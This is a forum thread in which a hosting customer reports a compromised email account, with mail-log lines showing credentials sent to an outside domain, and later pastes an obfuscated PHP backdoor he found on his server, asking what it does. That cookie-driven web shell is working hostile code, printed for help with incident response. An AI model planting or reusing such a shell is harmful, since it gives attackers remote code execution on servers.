Bounced Email with Password in Plain Text

jimhermann

Well-Known Member
Jan 20, 2008
71
2
58
Folks,

I received a bounced email that contained the account email address and password in Plain Text.

Did the Sender hack the account password and send themselves an email with the email address and password?

The original email came from my account: [email protected]
However, the IP Address was in Poland and the To Address was in Russian.

2020-12-16 13:42:01 1kpcgS-0000lp-Si <= [email protected] H=(127.0.0.1) [213.92.204.4]:36457 P=esmtpsa X=
TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:[email protected] S=476 T="invoice for NL325
2324" for [email protected]
2020-12-16 13:42:01 1kpcgS-0000lp-Si SMTP connection outbound 1608147721 1kpcgS-0000lp-Si domainname.com info1big
@supportwebarh.info
2020-12-16 13:44:08 1kpcgS-0000lp-Si H=supportwebarh.info [178.132.201.122] Connection timed out

The original email contained:

Return-path: <[email protected]>
Received: from [213.92.204.4] (port=36457 helo=127.0.0.1)
by host3.uuserver.net with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.93)
(envelope-from <[email protected]>)
id 1kpcgS-0000lp-Si
for [email protected]; Wed, 16 Dec 2020 13:42:01 -0600
X-mailer: Apple Mail (2.3273)
Subject: invoice for NL3252324
Date: Wed, 16 Dec 2020 20:42:03 +0100

[email protected]:[email protected]:PASSWORD:mail.domainname.com:465

I did not find any additional activity for IP Address 213.92.204.4 or domain name supportwebarh.info

Thanks,

Jim
 
Last edited by a moderator:

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
3,186
398
243
cPanel Access Level
Root Administrator
Hey there! Sorry to hear about this, and as you suspect, it seems like some type of compromise as cPanel never stores the passwords in plain text anywhere on the system. You'll want to have an admin review the security of the system, change the user and email passwords, and also possibly have any users with access to that cPanel account or email address scan their personal machines to ensure there is no malware present on those systems.
 

jimhermann

Well-Known Member
Jan 20, 2008
71
2
58
The compromised email address was never used as a username for other sites.

It appears that the encrypted password was hacked from a commercial site back in 2017. They must have been running a program to decipher the password since then.

They must have connected the email address for [email protected] with [email protected]. The passwords were the same.

I changed all the passwords and found one suspect PHP script: index547c5a.php

<?php
if(isset($_POST['check_it_script'])){echo 'it true work'; exit();}
if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==31&&in_array(gettype($p).count($p),$p))?(($p[13]=$p[13].$p[4
6])&&($p[54]=$p[13]($p[54]))&&($p=$p[54]($p[68],$p[13]($p[23])))&&$p()):$p;}
?>

I don't know what this code does.

Any ideas?

Jim
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
3,186
398
243
cPanel Access Level
Root Administrator
It definitely looks suspicious with the cookie values, and the name "check_it_script" but I'm not a PHP developer so I'm not 100% certain on what that is trying to achieve. It definitely seems like you've found the root of the issue though.